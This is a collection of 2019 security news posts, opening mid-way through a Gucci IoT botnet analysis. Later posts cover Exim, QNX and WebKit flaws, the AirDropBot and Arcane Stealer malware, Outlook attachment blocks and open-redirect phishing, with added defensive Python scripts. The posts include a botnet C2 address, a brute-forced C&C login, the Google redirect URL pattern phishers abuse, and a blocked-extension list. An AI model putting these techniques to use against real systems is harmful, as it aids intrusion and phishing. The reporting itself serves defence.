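Figure 2 is not reproduced here, so as an added example (not part of the SecNiche analysis) the following Python parser does what `file` did for that figure: it reads the ELF header and section table of each binary, reports class, endianness and target machine, and calls the image “stripped” when no SHT_SYMTAB section is present, which is the same test `file` applies. Because the real Gucci samples cannot be shipped with an article, the script builds minimal constructed ELF images (header and section table only, no code) to exercise the parser offline; `build_elf` and the sample names are assumptions for the example.

```python
import hashlib
import struct

SHT_SYMTAB, SHT_STRTAB = 2, 3
# e_machine values for the architectures in Listing 1 (plus x86-64 and AArch64).
MACHINES = {0x02: "SPARC", 0x03: "x86", 0x04: "m68k", 0x08: "MIPS", 0x14: "PowerPC",
            0x28: "ARM", 0x2A: "SuperH", 0x2B: "SPARC V9", 0x3E: "x86-64", 0xB7: "AArch64"}

# ELF header and section header layouts for ELF32 / ELF64 (52/64 and 40/64 bytes).
_EHDR = {32: "16sHHIIIIIHHHHHH", 64: "16sHHIQQQIHHHHHH"}
_SHDR = {32: "IIIIIIIIII", 64: "IIQQQQIIQQ"}


def elf_info(data: bytes) -> dict:
    """Report class, endianness, machine, section names and whether the image is
    stripped (no SHT_SYMTAB section present)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = {1: 32, 2: 64}[data[4]]            # EI_CLASS
    end = "<" if data[5] == 1 else ">"         # EI_DATA: 1 = little, 2 = big
    h = struct.unpack_from(end + _EHDR[bits], data, 0)
    machine, shoff, shentsize, shnum, shstrndx = h[2], h[6], h[11], h[12], h[13]
    fmt = end + _SHDR[bits]
    sections = [struct.unpack_from(fmt, data, shoff + i * shentsize) for i in range(shnum)]
    # sh_name, sh_type, sh_offset and sh_size sit at indices 0, 1, 4, 5 in both classes
    names = []
    if shstrndx < len(sections):
        s_off, s_size = sections[shstrndx][4], sections[shstrndx][5]
        strtab = data[s_off:s_off + s_size]
        for sec in sections:
            names.append(strtab[sec[0]:].split(b"\x00", 1)[0].decode("ascii", "replace"))
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "class": bits,
        "endian": "little" if end == "<" else "big",
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": names,
        "stripped": not any(sec[1] == SHT_SYMTAB for sec in sections),
    }


def build_elf(machine: int, bits: int = 32, little: bool = True, with_symtab: bool = False) -> bytes:
    """Constructed test input: an ELF header plus a section table and no code.
    Not a real sample; it exists only so elf_info() can run offline."""
    end = "<" if little else ">"
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1 if little else 2, 1]) + b"\x00" * 9
    shstr = b"\x00.shstrtab\x00.symtab\x00"            # name offsets 1 and 11
    entries = [(0, 0), (1, SHT_STRTAB)] + ([(11, SHT_SYMTAB)] if with_symtab else [])
    ehsize = struct.calcsize(end + _EHDR[bits])
    shentsize = struct.calcsize(end + _SHDR[bits])
    shoff = ehsize + len(shstr)                        # string table sits right after the header
    shdrs = b"".join(
        struct.pack(end + _SHDR[bits], name, typ, 0, 0,
                    ehsize if typ == SHT_STRTAB else 0,
                    len(shstr) if typ == SHT_STRTAB else 0, 0, 0, 0, 0)
        for name, typ in entries)
    ehdr = struct.pack(end + _EHDR[bits], ident, 2, machine, 1, 0, 0, shoff, 0,
                       ehsize, 0, 0, shentsize, len(entries), 1)
    return ehdr + shstr + shdrs


if __name__ == "__main__":
    # Constructed stand-ins for a few of the architectures listed in Listing 1
    samples = {"arm": build_elf(0x28), "mips": build_elf(0x08, little=False),
               "mpsl": build_elf(0x08), "x86": build_elf(0x03),
               "x86-64-dbg": build_elf(0x3E, bits=64, with_symtab=True)}
    for name, blob in samples.items():
        info = elf_info(blob)
        print(f"{name:11} {info['md5']} ELF{info['class']} {info['endian']}-endian "
              f"{info['machine']} {'stripped' if info['stripped'] else 'not stripped'}")
```

The `mips` and `mpsl` names in Listing 1 follow the Mirai convention for big- and little-endian MIPS builds, which is exactly the EI_DATA byte this parser reports; reading the header yourself also avoids trusting the file name, which a botnet operator controls. A truncated download raises `struct.error`, which is a useful signal in itself when mass-fetching binaries from a distribution host.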

The binaries were found to be obfuscated. On further analysis, the Gucci bot was found to connect to a remote IP on TCP port 5555 and to exchange data over that connection. Digging deeper, we found that the remote host was running a custom telnet service on TCP port 5555 and exchanging commands with Gucci bots regularly. When a test connection was initiated to TCP port 5555 on the remote IP with a telnet client, the connection was accepted and credentials were requested.

Compromising C&C

Without authentication credentials it was not possible to access the service. Considering all scenarios, automated brute-force and account-cracking attempts were performed. The account credentials were successfully cracked, and a connection was initiated and accepted once the credentials were supplied.

Figure 3 shows that the Gucci bot Command and Control panel was hijacked and privileged access was obtained.

Figure 3: Gucci C&C Bot Panel

The C&C listed the different Denial of Service (DoS) attack types supported by the Gucci bot:

  • HTTP null scan
  • UDP flood
  • SYN flood
  • ACK flood
  • UDP flood with fewer protocol options
  • GRE IP flood
  • Valve Source Engine specific flood

It was noticed that the Gucci bot was in the early stages of deployment. It was also observed that the botnet operator was monitoring all access connections to the Gucci C&C. As soon as the botnet operator realized that the C&C had been compromised, the TCP service was removed from the host, and the operator cleaned the directories and performed an additional set of operations to hide indicators and artefacts. The binaries were distributed from the location shown in Figure 4.

Figure 4: Gucci Bot – Source of Distribution

Inference

A new IoT bot, Gucci, has been discovered and analyzed. The botnet operator was found to be very proactive; the whole analysis, including obtaining C&C access, was like an arms race. The purpose of this research is to share the discovery details with the security research community so that the extracted intelligence can be used to fingerprint, detect and prevent Gucci bot infections. It is anticipated that the Gucci botnet is still active and targeting the European region. However, the attacks triggered by the Gucci bot could be broad-based or targeted, depending on the operator's requirements.

About the authors:

Aditya K Sood is a Cyber Security Expert and working in the field for more than 11 years now. His work can be found at: https://adityaksood.com;

Rohit Bansal is a Principal Security Researcher at SecNiche Security Labs

Pierluigi Paganini

(SecurityAffairs – malware, botnet)

The post Gucci IOT Bot Discovered Targeting European Region appeared first on Security Affairs.

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Tridium’s Niagara product is affected by two vulnerabilities in BlackBerry’s QNX operating system for embedded devices.

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities in Tridium’s Niagara product that reside in the BlackBerry’s QNX operating system for embedded devices.

The flaws could be exploited by a local user to escalate their privileges.

The Niagara Framework is a universal software infrastructure developed by Tridium that allows building controls integrators, HVAC and mechanical contractors to build custom, web-enabled applications for accessing, automating and controlling smart devices in real time over a local network or the Internet.

The Niagara framework is widely adopted, especially in the commercial facilities, government facilities, critical manufacturing and IT sectors.

The security flaws impact Niagara AX 3.8u4, 4.4u3 and 4.7u1.

The more severe vulnerability, tracked as CVE-2019-8998, is an information disclosure flaw in the procfs service that a local attacker can leverage for privilege escalation.

The flaw was discovered by Johannes Eger and Fabian Ullrich of the Secure Mobile Networking Lab at TU Darmstadt in Germany and received a CVSS score of 7.8.

“This advisory addresses an information disclosure vulnerability leading to a potential local escalation of privilege in the default configuration of the procfs service (the /proc filesystem) on affected versions of the BlackBerry QNX Software Development Platform (QNX SDP) that could potentially allow a successful attacker to gain unauthorized access to a chosen process address space.” reads the advisory.

BlackBerry QNX confirmed that it is not aware of attacks exploiting the flaw in the wild.

The second vulnerability, tracked as CVE-2019-13528, is an improper authorization issue: a specific utility could allow an attacker to gain read access to privileged files.

“A specific utility may allow an attacker to gain read access to privileged files in the Niagara AX 3.8u4 (JACE 3e, JACE 6e, JACE 7, JACE-8000), Niagara 4.4u3 (JACE 3e, JACE 6e, JACE 7, JACE-8000), and Niagara 4.7u1 (JACE-8000, Edge 10).” reads the advisory.

This flaw was reported by Francisco Tacliad and it received a CVSS score of 4.4.

Tridium has released updates that address these vulnerabilities and recommends users update to the versions identified below:

  • Niagara AX 3.8u4:
    • OS Dist: 2.7.402.2
    • NRE Config Dist: 3.8.401.1
  • Niagara 4.4u3:
    • OS Dist: 4.4.73.38.1
    • NRE Config Dist: 4.4.94.14.1
  • Niagara 4.7u1:
    • OS Dist (JACE-8000): 4.7.109.16.1
    • OS Dist (Edge 10): 4.7.109.18.1
    • NRE Config Dist: 4.7.110.32.1

Pierluigi Paganini

(SecurityAffairs – Tridium, IoT)

The post Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS appeared first on Security Affairs.

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

A recently observed malvertising campaign carried out by a threat group dubbed eGobbler hijacked roughly 1.16 billion ad impressions.

Researchers at Confiant observed a malvertising campaign carried out by a threat actor dubbed eGobbler hijacked roughly 1.16 billion ad impressions to redirect victims to websites hosting malicious payloads.

The campaign was observed between August 1 and September 23.

The eGobbler group was first observed by security firm Confiant in April, when it was exploiting a security flaw in the Google Chrome browser to target millions of iOS users. At the time, Confiant experts estimated that more than 500 million malicious ads had been served to iOS users.

This time eGobbler hackers extended their attacks to Windows, Linux, and macOS desktop devices.

“Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.” reads the analysis published by Confiant.

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.”

In the recent campaign, attackers used an exploit that targets WebKit-based browsers; the researchers observed redirections on WebKit browsers upon the ‘onkeydown’ event.

“The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame.” continues the analysis. “With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.”

Experts also discovered that the payload used in this campaign had specifically targeted some web applications using text areas and search forms in order to maximize the chances of hijacking these keypresses.

“eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing,” states Confiant.

Confiant reported the bug to both the Chrome and Apple security teams; the latter answered within the hour, while on August 9 the former responded that they were investigating.

On August 12, the Chrome team provided an update stating that a patch had been submitted to WebKit on August 9.

Apple addressed the issue in iOS 13 on September 19 and in Safari 13.0.1 on September 24.

The analysis published by the experts includes Indicators of Compromise for the recent campaign, including a list of content delivery networks (CDNs) used by the eGobbler threat actor to deliver the malicious payloads.

Pierluigi Paganini

(SecurityAffairs – eGobbler, hacking)

The post eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions appeared first on Security Affairs.

A new critical flaw in Exim exposes email servers to remote attacks

Exim maintainers released an urgent security update to address a critical security flaw that could allow a remote attacker to potentially execute malicious code on targeted servers.

Exim maintainers released an urgent security update, Exim version 4.92.3, to address a critical security vulnerability that could allow a remote attacker to crash or potentially execute malicious code on targeted email servers.

The flaw is a heap-based buffer overflow, tracked as CVE-2019-16928, that resides in the string_vformat (string.c). An attacker could exploit the flaw using an extraordinary long EHLO string to crash the Exim process that is receiving the message.

“There is a heap-based buffer overflow in string_vformat (string.c). The currently known exploit uses extraordinary long EHLO string to crash the Exim process that is receiving the message. While this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.” reads the security advisory published by the maintainers.

The CVE-2019-16928 flaw was reported by Jeremy Harris of the Exim Development Team; it affects all versions of the Exim email server software from 4.92 up to and including 4.92.2. The expert also released a PoC exploit for this vulnerability.

In early September, the Exim development team addressed another vulnerability in the popular mail server, tracked as CVE-2019-15846. The vulnerability could be exploited by local and remote attackers to execute arbitrary code with root privileges.

The vulnerability is a heap overflow that affects version 4.92.1 and prior of Exim mail server that accepts TLS connections. The vulnerability affects both GnuTLS and OpenSSL.

In mid-June, researchers observed several threat actors exploiting another flaw in the popular software, tracked as CVE-2019-10149, that resides in the deliver_message() function in /src/deliver.c and is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server. Exim's development team had addressed the CVE-2019-10149 flaw with the release of version 4.92 in February.

The flaw is easily exploitable by a local attacker, and by a remote attacker in certain non-default configurations; it was actively exploited in the wild by various groups of hackers to compromise vulnerable servers.
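Three Exim advisories in four months, each with a different affected range, make “which of my MTAs is still exposed?” the practical question. As an added example (not from the Exim advisories or from this article), the following Python script extracts the version from an SMTP greeting banner and compares it against the affected ranges stated above. Tuples are used for the comparison because a string compare gets “4.92” and “4.92.1” wrong. The 4.87 lower bound for CVE-2019-10149 comes from the Exim advisory rather than the text above, the CVE-2019-15846 range is taken as “4.92.1 and prior” with no lower bound, and the banners are constructed, not real hosts.

```python
import re

# Inclusive affected ranges. None means no lower bound.
# The 4.87 lower bound for CVE-2019-10149 is from the Exim advisory; the
# article above only names the fixing release (4.92).
AFFECTED = {
    "CVE-2019-16928": ((4, 92), (4, 92, 2)),
    "CVE-2019-15846": (None, (4, 92, 1)),
    "CVE-2019-10149": ((4, 87), (4, 91)),
}
FIXED_RELEASE = "4.92.3"
_VER = re.compile(r"\bExim\s+(\d+\.\d+(?:\.\d+)?)", re.I)


def parse_version(text: str):
    """Return the Exim version found in text as an int tuple, or None.

    Tuples compare component-wise, so (4, 92) < (4, 92, 1) < (4, 92, 2);
    comparing the strings "4.92" and "4.92.1" would not give that order.
    """
    m = _VER.search(text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def affected_cves(version: tuple) -> list:
    """CVE identifiers whose stated range covers this version, sorted."""
    return sorted(cve for cve, (low, high) in AFFECTED.items()
                  if (low is None or version >= low) and version <= high)


def check_banner(banner: str) -> dict:
    """Triage one SMTP greeting; a non-Exim or versionless banner yields no CVEs."""
    version = parse_version(banner)
    if version is None:
        return {"version": None, "cves": [], "note": "no Exim version in banner"}
    cves = affected_cves(version)
    return {"version": ".".join(map(str, version)), "cves": cves,
            "note": "patched" if not cves else f"update to {FIXED_RELEASE} or later"}


# Constructed banners for the example, not captured from real hosts.
SAMPLE_BANNERS = [
    "220 mx1.example.invalid ESMTP Exim 4.91 Mon, 30 Sep 2019 09:00:00 +0000",
    "220 mx2.example.invalid ESMTP Exim 4.92.1 Mon, 30 Sep 2019 09:00:00 +0000",
    "220 mx3.example.invalid ESMTP Exim 4.92.3 Mon, 30 Sep 2019 09:00:00 +0000",
    "220 mx4.example.invalid ESMTP Postfix",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        r = check_banner(banner)
        print(f"{banner.split()[1]:22} {r['version'] or '-':8} {', '.join(r['cves']) or '-':33} {r['note']}")
```

A banner is only a hint: the greeting text is configurable (smtp_banner), so a host that hides its version is not thereby patched. On the box itself, `exim -bV` prints the real version and build options and is the value to record.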

The major Linux distributions, including Ubuntu, Arch Linux, FreeBSD, Debian and Fedora, have already released security updates.

Pierluigi Paganini

(SecurityAffairs – Mail Server, hacking)

The post A new critical flaw in Exim exposes email servers to remote attacks appeared first on Security Affairs.

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

After 2 years of waiting, MalwareMustDie returns with an excellent page of malware analysis of a new IoT malware: Linux/AirDropBot.

Yes, I have to confess, it was hard to wait all this time, but the reward was worth it: unixfreaxjp is back with a new, great page of reverse engineering published on the MalwareMustDie blog: “MMD-0064-2019 – Linux/AirDropBot”.

And this is not only Odisseus's opinion, just because I can be counted as a member of the MalwareMustDie crew: this last post IS a masterpiece, technically speaking, because here unixfreaxjp reveals some unique and undocumented best practices for reversing Linux malware binaries (Intel and non-Intel platforms), giving every whitehat reverser many references and how-tos for dealing with ELF Linux malware, mixing theory and practice and showing how incredibly useful Radare r2 and the Tsurugi distribution are.

I don't know whether it is because I have asked my friend unixfreaxjp many times to publicly show how Radare r2 can be used with great results, but after this post we can definitively state that, once again, Radare r2 has nothing to envy of the best commercial tools used in the many reverse engineering tutorials available on YouTube.

In fact this time we do not have a “simple” blog post, but a rich, strong and powerful technical lesson on how stripped binaries can be reversed even though they are “indeed” stripped.

Step by step, unixfreaxjp leads the reader to understand how the malware code is built, what the methods are, what the secrets are, which hidden techniques the coders use to hide and encrypt the C2 address as much as possible, how the operative commands coming from the C2 are parsed, and how almost everything can be reconstructed to get the source code back from a stripped binary.

The beginning of the story: another IoT malware in the wild?

But let's go back to the beginning of the story, when my very good friend @0xrb found in his honeypot this new “Mirai-like” Linux malware, which has important differences from the Mirai implementation. He immediately understood that there was something strange in this new “Mirai variant” and proposed the sample to the MalwareMustDie team: here is his early tweet.

It is also possible to look at the logs of the malware that @0xrb published on Pastebin: a lot of information from the running phase is made available there. One item, for example, is the C2 server.

The C2 of the botnet was: 147.135.174.119

As unixfreaxjp states in his post, @0xrb successfully submitted the sample to the MalwareMustDie team for deeper analysis, and the result is another great page of Linux malware reversing that every malware analyst should read and re-read.

We will not repeat the technical analysis here, because the MalwareMustDie post is extremely clear and explanatory in every single part.

Coming to the core topic: IoT botnet threat and their ecosystem

New Linux malware aimed at the Internet of Things is appearing a lot and, as previously mentioned, it is driven by the money scheme that fuels the botnet ecosystem, as previously covered on Security Affairs; this is still the main reason why freshly coded malware in this sector keeps coming up.

First spotted on the Internet on August 3rd, 2019, Linux/AirDropBot is a malware built to target many embedded Linux platforms; it is meant to propagate its botnet onto several platforms originally designed and built for IoT use. Judging from some unimplemented functions it is still not in the final stage of development, but the adversary's mission is clear: to infect as many Linux IoT devices as possible and get rid of competitors. It was first detected as Mirai- or Gafgyt-like when the first series of samples was spotted, and this may have led Linux malware researchers to ignore its early existence.

Many processors are targeted by the malware, and when CPUs like ARC cores, Renesas SH, Motorola m68000, Altera Nios II, Tensilica Xtensa and Xilinx MicroBlaze are targeted along with the other generic cross-compiled CPUs (MIPS/ARM/PPC/SPARC/Intel), the herder means serious business in “pwning” every reachable IoT device. The binaries fall into two categories: one that acts as a bot and is meant to infect small devices, and, for bigger systems, a worm-like vulnerability scanner that targets a CGI page on routers (in this version HTTP port 8080 on a specific product's CGI file) so that the bot can spread itself in worm-like fashion, together with telnet scanning (attacking TCP port 23 or 2323).

The analysis in MalwareMustDie's recent post “MMD-0064-2019 – Linux/AirDropBot” shows the latest binary sets used by the adversaries behind this botnet. The scanner function for exploiting a certain router vulnerability is hardcoded, and in older sample deliveries this threat aimed at other exploits too. The overall idea is a known one, but the code is newly made.

Final considerations on the behavior to adopt in order to face this threat.

Internet of Things security is improving, and governments all over the globe are seriously handling this: for example, in the US the “Security Feature Recommendations for IoT Devices” by NIST is a good recommended plan; in the UK a voluntary Code of Practice (CoP) to help manufacturers boost the security of internet-connected devices has been published; and in Japan the Project to Survey IoT Devices and to Alert Users has been started. Yet there are a lot of products to handle, and vulnerabilities in these products are researched at the same time by adversaries.
This is why IoT threats keep causing a lot of issues: day by day new exploits come up, old issues are re-used, and unpatched segments are revealed and targeted.

Are we on the wrong track then? I don't think so. Yes, the process takes time, and what we can do is keep improving the detection of new threats, containment and response as prevention to strengthen the defense scheme for the platform, along with the parallel legal work on stopping adversaries. If we commit to keep doing these steps, the adversaries will find more demerits than merits in continuing to hammer us with their botnets.

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(SecurityAffairs – AirDropBot, malware)

The post Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot appeared first on Security Affairs.

Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks

Iran ‘s oil minister on Sunday ordered representatives of the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“It is necessary for all companies and installations of the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry's Shana website.

Iran fears retaliation from Western countries, which accuse it of carrying out physical and cyber attacks against their infrastructure and against countries in the Middle East.

Iran's oil ministry said that the Government in Washington has launched a “full-scale economic war” against the Islamic republic.

In mid-September, drone attacks hit two major oil facilities run by the state-owned company Aramco in Saudi Arabia, one of them the Abqaiq site.

Iran-backed Houthi rebels in Yemen claimed responsibility for the attacks on the Abqaiq plant, according to a spokesman for the group in Yemen, it had deployed 10 drones in the attacks.

The group is threatening Saudi Arabia with further attacks. The Iran-aligned Houthi rebel movement has been fighting the Yemeni government and a coalition of regional countries led by Saudi Arabia since 2015, when President Abdrabbuh Mansour Hadi was driven out of Sanaa by the Houthis.

Secretary of State Mike Pompeo blamed Iran for coordinating the attacks, adding that we are facing an unprecedented attack on the world's energy supply.

Riyadh, Berlin, London, and Paris also blame Teheran for attacks that caused severe damages to the Saudi oil sector on September 14.

Iran denied any involvement in the attacks. Immediately after the attacks, US President Donald Trump announced that his country was preparing a response. President Trump opted for an intensification of economic sanctions against Teheran.

Military and intelligence experts believe that a Western coalition led by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some Western media reported destructive cyber attacks against infrastructure in the Iranian oil sector, but Iran denied it.

“Contrary to Western media claims, investigations done today show no successful cyber attack was made on the country’s oil installations and other crucial infrastructure,” reads a statement published by the government’s cyber security office.

Despite the statement, security experts believe that a cyber offensive against Iranian infrastructure is ongoing.

Pierluigi Paganini

(SecurityAffairs – Iran, oil sector)

The post Iran’s oil minister orders ‘Full Alert’ for oil sector on against attacks appeared first on Security Affairs.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .net information-stealing malware that is easy to acquire in the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web, the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, it goes for just $9 on the Dark Web, and could be also used by lower-skilled adversaries. Due to the low-cost of the malware, experts believe that its popularity could rapidly increase.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system and browser information, cryptocurrency wallets, instant-messaging sessions from Telegram, Discord and Pidgin, and data (i.e. passwords, cookies and form data) from several browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V can also be used to steal documents, collect Steam gaming community data, log detected virtual machine IPs, and collect data from FileZilla servers.

The threat actor behind the Arcane Stealer V also provides dashboards and statistics to show crooks that buy the malware the potential earnings.

When the malware runs, it takes a screenshot and then it creates a text log file of what was collected.

“When ran, the file collects data, takes a screenshot and then it creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. ” It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack” that were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man who says he suffers from a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that the malware unlike other threats doesn’t discriminate geo-location of the victims and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

Microsoft announced last week it is going to expand the list of file extensions that are blocked in Outlook on the web.

Microsoft announced that it will immediately block additional file extensions for its Outlook on the web users, who will no longer be able to download attachments of these types.

Microsoft pointed out that the newly blocked file types are rarely used, so most organizations should not be affected by the change.

The list of file types that will be blocked by Microsoft includes extensions used by popular programming languages, such as “.py”, “.pyc”, “.pyo”, “.pyw”, “.pyz” and “.pyzw” (used by Python); “.ps1”, “.ps1xml”, “.ps2”, “.ps2xml”, “.psc1”, “.psc2”, “.psd1”, “.psdm1”, “.cdxml” and “.pssc” (used by PowerShell); and “.jar” and “.jnlp” (used by Java).

Microsoft also announced it will block “.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab” and “.grp”.

Other file types that will be blocked by the tech giant are the ones with the “.appref-ms” extension used by Windows ClickOnce, the “.udl” extension used by Microsoft Data Access Components (MDAC), the “.wsb” extension used by Windows Sandbox, and the “.cer”, “.crt” and “.der” extensions associated with digital certificates.

“The following extensions are used by various applications.” reads the post published by Microsoft. “While the associated vulnerabilities have been patched (for years, in most cases), they are being blocked for the benefit of organizations that might still have older versions of the application software in use:

“.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab”, “.grp”

If an organization needs to allow a particular file type, admins can add the extension to the AllowedFileTypes property of the users’ OwaMailboxPolicy objects.

“If you want a particular file type to be allowed, you can add that file type to the AllowedFileTypes property of your users’ OwaMailboxPolicy objects.” continues the post. “To add a file extension to the AllowedFileTypes list:

$policy = Get-OwaMailboxPolicy [policy name]
$allowedFileTypes = $policy.AllowedFileTypes
$allowedFileTypes.Add(".foo")
Set-OwaMailboxPolicy $policy -AllowedFileTypes $allowedFileTypes

“Security of our customer’s data is our utmost priority, and we hope our customers will understand and appreciate this change. Change can be disruptive, so we hope the information here explains what we’re doing and why,” Microsoft concludes.
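The check below is an added example, not Microsoft’s code or part of the original post: the real gate runs inside Exchange Online, so this Python stand-in only models the extension-list logic the announcement describes (last suffix, case-insensitive), shows how an allow-list entry re-opens a newly blocked type as the quoted procedure implies, and gives admins a quick audit of which newly blocked extensions their policy has re-allowed. The precedence of AllowedFileTypes over the block list is an assumption taken from the quoted guidance.

```python
# Model of the Outlook on the web attachment gate described in the article.
# Added example; not Microsoft's implementation. Assumption: an extension
# present in AllowedFileTypes wins over the block list, as the quoted
# guidance implies.

# Extensions the announcement adds to the block list (as listed in the text).
NEWLY_BLOCKED = frozenset({
    ".py", ".pyc", ".pyo", ".pyw", ".pyz", ".pyzw",
    ".ps1", ".ps1xml", ".ps2", ".ps2xml", ".psc1", ".psc2", ".psd1",
    ".psdm1", ".cdxml", ".pssc", ".jar", ".jnlp",
    ".appcontent-ms", ".settingcontent-ms", ".cnt", ".hpj", ".website",
    ".webpnp", ".mcf", ".printerexport", ".pl", ".theme", ".vbp", ".xbap",
    ".xll", ".xnk", ".msu", ".diagcab", ".grp",
    ".appref-ms", ".udl", ".wsb", ".cer", ".crt", ".der",
})


def attachment_extension(filename: str) -> str:
    """Normalize a filename to the extension compared against the lists.

    Only the final suffix counts ("report.pdf.ps1" -> ".ps1"), comparison is
    case-insensitive, trailing dots/whitespace are ignored (Windows drops
    them), and a name without a suffix yields "".
    """
    name = filename.strip().rstrip(".")
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "." not in base:
        return ""
    return "." + base.rsplit(".", 1)[1].lower()


def evaluate(filename: str, blocked=NEWLY_BLOCKED, allowed=frozenset()) -> str:
    """Return "blocked" or "allowed" for an attachment under the given policy."""
    ext = attachment_extension(filename)
    if ext in {e.lower() for e in allowed}:
        return "allowed"          # assumption: AllowedFileTypes takes precedence
    if ext in blocked:
        return "blocked"
    return "allowed"


def audit_allow_list(allowed, newly_blocked=NEWLY_BLOCKED):
    """List newly blocked extensions that a policy's AllowedFileTypes re-opens.

    Run this against each OwaMailboxPolicy's AllowedFileTypes to see where the
    new default protection has been overridden.
    """
    return sorted(e.lower() for e in allowed if e.lower() in newly_blocked)


if __name__ == "__main__":
    print(evaluate("Report.PDF.PS1"))                      # blocked
    print(evaluate("Report.PDF.PS1", allowed={".ps1"}))    # allowed
    print(audit_allow_list({".ps1", ".PDF", ".Jar"}))      # ['.jar', '.ps1']
```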

Pierluigi Paganini

(SecurityAffairs – Outlook, hacking)


Phishers continue to abuse Adobe and Google Open Redirects

Adobe and Google Open Redirects Abused by Phishing Campaigns

Experts reported that phishing campaigns are leveraging Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Phishers are abusing Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Crooks abuse Google and Adobe services to craft URLs that ultimately point to malicious websites but still pass security filters, because they appear to be legitimate URLs on the domains of trusted IT giants.

“Open redirectors take you from a Google URL to another website chosen by whoever constructed the link. Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place.” reads the post published by Google.

“Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored offers fairly clear benefits and poses very little practical risk.”

An example of a Google open redirect that could be abused by attackers is https://www.google.com/url?q=[url], where [url] is the destination chosen by whoever built the link.

“Phishing campaigns commonly utilize open redirects from well known companies as they feel users will be more likely to click on a link if it belongs to Google or Adobe.” reported BleepingComputer.

Below is an example of a phishing message that uses a Google open redirect pointing to a fake login page.

In a similar way, attackers could abuse the Adobe redirect service in phishing campaigns.

Experts suggest administrators and users remain vigilant about open redirects.
